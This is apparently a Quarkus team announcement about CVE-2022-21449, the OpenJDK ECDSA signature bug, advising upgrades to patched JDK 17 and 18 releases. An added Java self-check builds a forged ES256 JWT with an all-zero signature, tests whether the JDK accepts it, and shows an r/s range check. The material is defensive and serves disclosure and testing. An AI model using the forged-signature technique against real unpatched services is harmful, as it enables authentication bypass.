Quarkus and Java ECDSA Signature Vulnerability #25252
maxandersen
announced in
Announcements
TL;DR: please upgrade to the latest bug-fix release of OpenJDK 17 or 18, especially if your Java applications verify JWT tokens. This is not specific to Quarkus; it is caused by a bug in OpenJDK, but it is important enough that we want to inform you about it.
An ECDSA signature vulnerability, recorded as CVE-2022-21449, has recently been discovered in Java 17 and 18, as well as in the no longer supported Java 15 and 16.
Please see the blog posts "CVE-2022-21449: Psychic Signatures in Java" and "A few clarifications about CVE-2022-21449" by Neil Madden for more information.
This vulnerability may affect any Java application that delegates ECDSA signature verification to the JDK (java.security.Signature). Most Java applications do so, because writing custom ECDSA signature verification code is risky.
For example, an application that verifies an OpenID Connect token signed with the ES256 algorithm could be affected.
How can it affect Quarkus users?
Your Quarkus application could be affected when it runs on an affected OpenJDK 17 or 18 and uses one of the following extensions:
- ECDSA (ES256) signatures
- ES256 or other ECDSA algorithms such as ES384 or ES512 for signing JWT tokens
- WebAuthn authenticators use ECDSA signatures
How to fix it
If your application is affected, install an update of your OpenJDK distribution that contains the April 2022 Critical Patch Update (OpenJDK 17.0.3 or 18.0.1, or later); after that you can continue working with ECDSA signatures safely. For example, if you use the OpenJDK provided by Red Hat, see https://access.redhat.com/errata/RHSA-2022:1445; other distributors of OpenJDK should have similar updates available.
No changes in Quarkus or in your application are necessary, as the issue is caused purely by the bug in OpenJDK. For the same reason, this recommendation to update to the latest OpenJDK 17 or 18 release also applies to non-Quarkus applications.
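The program below is an added example, not code from this announcement or from Quarkus. It builds an ES256 JWT whose signature is 64 zero bytes (r = 0, s = 0, the forged signature described in Neil Madden's posts cited above), asks the running JDK to verify it through java.security.Signature, and also shows the application-side range check on r and s that rejects such a signature independently of the JDK version. The header, claims and issuer URL are constructed for the example, and the class and method names are assumptions of this example rather than any Quarkus API.

```java
import java.math.BigInteger;
import java.nio.charset.StandardCharsets;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.PublicKey;
import java.security.Signature;
import java.security.SignatureException;
import java.security.spec.ECGenParameterSpec;
import java.util.Arrays;
import java.util.Base64;

/**
 * Self-check for CVE-2022-21449: does this JDK accept an ES256 JWT whose
 * ECDSA signature is all zero bytes? Stand-alone example, not Quarkus code.
 */
public class PsychicSignatureCheck {

    // Group order n of P-256 (secp256r1); a valid ECDSA signature needs 1 <= r, s <= n-1.
    private static final BigInteger P256_N =
        new BigInteger("FFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551", 16);

    // "header.payload" of an ES256 token; header and claims are constructed for this example.
    static String signingInput() {
        Base64.Encoder b64 = Base64.getUrlEncoder().withoutPadding();
        String header = b64.encodeToString(
            "{\"alg\":\"ES256\",\"typ\":\"JWT\"}".getBytes(StandardCharsets.UTF_8));
        String payload = b64.encodeToString(
            "{\"sub\":\"alice\",\"iss\":\"https://issuer.example\"}".getBytes(StandardCharsets.UTF_8));
        return header + "." + payload;
    }

    // Application-side guard: reject r or s outside [1, n-1] before the JDK sees the signature.
    // This catches the all-zero signature on any JDK version; the real fix is still the JDK update.
    static boolean rsInRange(byte[] p1363Sig) {
        if (p1363Sig.length != 64) return false;
        BigInteger r = new BigInteger(1, Arrays.copyOfRange(p1363Sig, 0, 32));
        BigInteger s = new BigInteger(1, Arrays.copyOfRange(p1363Sig, 32, 64));
        return r.signum() > 0 && r.compareTo(P256_N) < 0
            && s.signum() > 0 && s.compareTo(P256_N) < 0;
    }

    // Hands the raw r||s (IEEE P1363) signature to the JDK, exactly as a JWT library would.
    static boolean jdkVerifies(PublicKey key, String signingInput, byte[] sig) throws Exception {
        Signature verifier = Signature.getInstance("SHA256withECDSAinP1363Format");
        verifier.initVerify(key);
        verifier.update(signingInput.getBytes(StandardCharsets.US_ASCII));
        try {
            return verifier.verify(sig);
        } catch (SignatureException e) {
            return false; // a patched JDK may reject the signature with an exception instead of false
        }
    }

    public static void main(String[] args) throws Exception {
        KeyPairGenerator kpg = KeyPairGenerator.getInstance("EC");
        kpg.initialize(new ECGenParameterSpec("secp256r1"));
        KeyPair kp = kpg.generateKeyPair();

        String input = signingInput();
        byte[] zeroSig = new byte[64]; // r = 0, s = 0: producible by anyone without the private key
        String forgedToken = input + "."
            + Base64.getUrlEncoder().withoutPadding().encodeToString(zeroSig);
        System.out.println("forged token: " + forgedToken);
        System.out.println("r,s range check rejects it: " + !rsInRange(zeroSig));

        boolean accepted = jdkVerifies(kp.getPublic(), input, zeroSig);
        System.out.println(System.getProperty("java.runtime.version") + " accepts it: " + accepted);
        if (accepted) {
            System.out.println("VULNERABLE: this JDK accepts the all-zero ECDSA signature (CVE-2022-21449); upgrade.");
        }

        // Sanity check: a genuine signature passes the range check and still verifies.
        Signature signer = Signature.getInstance("SHA256withECDSAinP1363Format");
        signer.initSign(kp.getPrivate());
        signer.update(input.getBytes(StandardCharsets.US_ASCII));
        byte[] realSig = signer.sign();
        System.out.println("genuine signature verifies: "
            + (rsInRange(realSig) && jdkVerifies(kp.getPublic(), input, realSig)));
    }
}
```

Compile and run it with the JDK you deploy on (`javac PsychicSignatureCheck.java && java PsychicSignatureCheck`): a patched JDK (17.0.3, 18.0.1 or later) prints `accepts it: false`, an affected one prints `true`. The range check is defence in depth for code that unpacks signatures itself; it does not replace updating the JDK.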
Happy updating,
The Quarkus Team